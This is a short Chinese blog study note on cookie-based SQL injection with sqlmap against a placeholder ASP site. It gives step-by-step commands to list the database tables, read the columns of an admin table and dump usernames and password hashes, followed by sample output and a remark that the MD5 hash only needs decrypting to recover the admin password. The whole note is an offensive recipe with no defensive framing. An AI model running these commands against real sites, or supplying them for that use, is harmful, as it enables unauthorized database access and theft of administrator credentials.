sqlmap学习笔记之Cookie注入

Cookie注入:

1.假设这个网址"http://www.xxx.org/Show.asp?id=9"存在注入点.
2.sqlmap命令提示符下输入下列内容进行跑表。

  sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --table --level 2

假设返回内容如下,说明是access数据库。

   -------------------------
   
   [INFO] resuming back-end DBMS 'microsoft access'

   -------------------------

设置线程数:10
假设返回结果:

-------------------------------------------
[ 4 tables]

+----------------------+

       admin
       mark
       province
       vote

+----------------------+

找到四个表分别为:admin mark province vote

3.猜表的字段名:

  sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --columns -T admin --level 2

假设找到admin表的字段如下:
id username password

---------------------------------

  [INFO] retrieved:       id
  [INFO] retrieved:       username
  [INFO] retrieved:       password

----------------------------------

4.猜测字段的内容:

    sqlmap -u "http://www.xxx.org/Show.asp" --cookie "id=9" --dump -T admin -C "username,password" --level 2

获取结果:

  [INFO] retrieved:       1
  [INFO] retrieved:       admin
  [INFO] retrieved:       21232f297a57a5a743894a0e4a801fc3  (32位MD5加密密文)

账号:admin 密码:将密文解密即可。

Last modification:July 11th, 2018 at 09:45 pm
If you think my article is useful to you, please feel free to appreciate

Leave a Comment